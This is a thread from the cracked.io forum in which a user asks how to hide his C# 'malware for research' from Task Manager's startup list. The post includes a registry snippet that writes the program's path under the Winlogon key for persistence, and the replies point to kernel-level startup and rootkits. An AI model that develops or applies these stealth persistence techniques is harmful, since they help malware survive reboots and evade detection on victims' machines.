Navigation X
ALERT
Click here to register with a few steps and explore all our cool stuff we have to offer!

cracked.io | Best Forum Around | Free Premium Accounts




 695

[.NET C#] How To Hide Startup Program ? - I need assisstance

by DonDesktopApps - 06 August, 2022 - 04:00 PM
This post is by a banned member (DonDesktopApps) - Unhide
This post is by a banned member (SpoofClub) - Unhide
SpoofClub  
Infinity
80
Posts
3
Threads
4 Years of service
#2
(06 August, 2022 - 04:00 PM)DonDesktopApps Wrote: Show More
I'm programming a small malware for research using C# and I was wondering if it's possible to 
put my malware on Startup and make it undetectable without it showing in the Startup Section in Task Manager

I already tried a couple of codes but nothing happened i need help
 
Code:
 
using Microsoft.Win32;

RegistryKey reg = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", true);


reg.SetValue("kamikazemalwarekh", Application.ExecutablePath.ToString());

You can do kernel startup but that requires kernel premissions
[Image: sig.gif]
This post is by a banned member (71X) - Unhide
71X  
Registered
21
Posts
0
Threads
#3
It's pretty simple use a rootkit

Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
or
Sign in
Already have an account? Sign in here.


Forum Jump:


Users browsing this thread: 1 Guest(s)